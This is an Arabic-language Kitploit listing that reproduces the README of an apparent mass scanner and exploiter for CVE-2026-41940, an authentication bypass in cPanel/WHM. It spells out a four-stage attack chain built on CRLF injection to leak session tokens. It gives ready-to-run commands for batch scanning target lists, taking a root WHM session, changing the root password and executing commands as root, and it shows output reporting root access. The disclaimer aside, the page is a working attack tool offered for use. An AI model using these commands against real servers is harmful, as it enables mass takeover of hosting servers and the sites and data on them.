Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41940 — cPanel/WHM CVE-2026-41940 - ماسح ومستغل جماعي | Kitploit
أدوات/GitHubGitHub/lutfifakee-project/cve-2026-41940
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالمصادقةالفريق الأحمرتطوير الحمولات
GitHublutfifakee-project/cve-2026-41940

CVE-2026-41940

cPanel/WHM CVE-2026-41940 - ماسح ومستغل جماعي

25منذ 4 أشهرلم تتم المراجعة بعد
عرض المستودعالموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41940 - أداة فحص واستغلال تجاوز المصادقة في cPanel/WHM

Python License Security Tested on

أداة فحص واستغلال ثغرة تجاوز المصادقة في cPanel/WHM لـ CVE-2026-41940


⚠️ إخلاء مسؤولية

تم توفير هذه الأداة لأغراض تعليمية وللاختبارات الأمنية المصرح بها فقط.

باستخدامك لهذه الأداة، فإنك توافق على ما يلي:

  • ستقوم فقط باختبار الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
  • أنت تدرك أن الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
  • أنت وحدك المسؤول عن أفعالك أثناء استخدام هذه الأداة.
  • لا يجوز لك إعادة توزيع هذه الأداة أو تعديلها أو ادعاء ملكيتها.

❗ المؤلف ليس مسؤولاً عن أي إساءة استخدام أو أنشطة غير قانونية أو أضرار أو عواقب قانونية ناتجة عن استخدام هذه الأداة.


🎯 نظرة عامة

CVE-2026-41940 هي ثغرة حرجة في تجاوز المصادقة في cPanel/WHM قد تسمح للمهاجمين بالحصول على وصول غير مصرح به على مستوى الجذر (root) دون بيانات اعتماد صالحة.

توفر هذه الأداة تنفيذًا قائمًا على Python من أجل:

  • اكتشاف الأهداف المعرضة للخطر
  • أتمتة الاستغلال (للاختبار المصرح به)
  • إجراء فحص واسع النطاق

🔥 سلسلة الهجوم المكونة من 4 مراحل

المرحلةالوصف
1. ما قبل المصادقةإرسال بيانات اعتماد غير صالحة إلى /login/ للحصول على Cookie باسم whostmgrsession
2. حقن CRLFحقن سطر جديد عبر ترويسة Authorization: Basic لتسريب رمز cpsess
3. نشر الرمزتشغيل do_token_denied لنشر الرمز في الذاكرة المؤقتة (cache)
4. التحققالوصول إلى /json-api/version لتأكيد وصول الجذر إلى WHM

✨ الميزات

الميزةالوصف
🔄 الفحص الجماعيفحص أهداف متعددة في وقت واحد
🎯 هدف واحدفحص هدف فردي مع مخرجات تفصيلية
🔌 فحص المنافذفحص تلقائي لمنافذ WHM (2082, 2083, 2086, 2087)
🔓 رابط الجلسةتوليد رابط تسجيل دخول WHM بنقرة واحدة
💀 تنفيذ الأوامر عن بُعد (RCE)تنفيذ أوامر النظام بصلاحيات الجذر
🔑 تغيير كلمة المرورتعديل كلمة مرور الجذر لـ WHM
📡 استدعاءات واجهة برمجة تطبيقات WHMاستدعاء دوال واجهة برمجة تطبيقات WHM
🎨 مخرجات ملونةمخرجات مرئية للنتائج
💾 تصدير النتائجحفظ الأهداف المعرضة للخطر في ملف

📋 المتطلبات

root@kitploit:~
Python 3.7+
pip install requests urllib3

🚀 التثبيت

root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt

# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com

📖 الاستخدام

الأوامر الأساسية

root@kitploit:~
# Single target
python cpanel-mass-checker.py -u https://target.com:2087

# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20

# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt

# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com

# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com

# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com

# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com

📄 تنسيق ملف الأهداف (targets.txt)

root@kitploit:~
# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083

⚙️ المعلمات

المعاملالوصفمثال
-uرابط هدف واحد-u https://target.com:2087
-fملف قائمة الأهداف-f targets.txt
-cالتزامن (الخيوط)-c 20
-oملف الإخراج-o results.txt
-hostnameترويسة Host مخصصة-hostname cpanel.target.com
--scan-portsفحص جميع منافذ WHM--scan-ports
-sessionتوليد رابط تسجيل الدخول-session
-passwdتغيير كلمة مرور الجذر-passwd "NewPass123"
-cmdتنفيذ أمر-cmd "id"
-keepالاحتفاظ بالحساب المؤقت-keep
-apiاستدعاء واجهة برمجة تطبيقات WHM-api listaccts
-api-paramsمعاملات واجهة البرمجة-api-params "user=root,password=123"

📊 مثال على المخرجات

الفحص الجماعي

root@kitploit:~
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt

توليد رابط الجلسة

root@kitploit:~
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
    https://example.com:2087/cpsessXXXXXXX/

🛡️ تفاصيل الثغرة

الحقلالقيمة
CVECVE-2026-41940
الخطورةحرجة (CVSS 9.8)
ناقل الهجومالشبكة
الامتيازات المطلوبةلا شيء
تفاعل المستخدملا شيء

الإصدارات المتأثرة

  • WHM 11.110.x < 11.110.0.97
  • WHM 11.118.x < 11.118.0.63
  • WHM 11.126.x < 11.126.0.54
  • WHM 11.132.x < 11.132.0.29
  • WHM 11.134.x < 11.134.0.20
  • WHM 11.136.x < 11.136.0.5

⚠️ ملاحظات مهمة

  • استخدم فقط على الأنظمة المصرح بها
  • رموز الجلسة تنتهي صلاحيتها بسرعة
  • قد يفشل تنفيذ الأوامر (RCE) على التراخيص المقيدة
  • تتطلب بعض الأهداف استخدام -hostname
  • جميع الاتصالات تستخدم HTTPS

🧪 بيئة الاختبار

للاختبار الآمن والقانوني:

  • استخدم خادمك الخاص (VPS/server)
  • قم بإعداد بيئة مختبرية قابلة للاختراق
  • احصل دائمًا على إذن كتابي

⭐ الدعم

إذا كان هذا المشروع مفيدًا لك، ففكر في منحه نجمة ⭐

تنزيل الأداة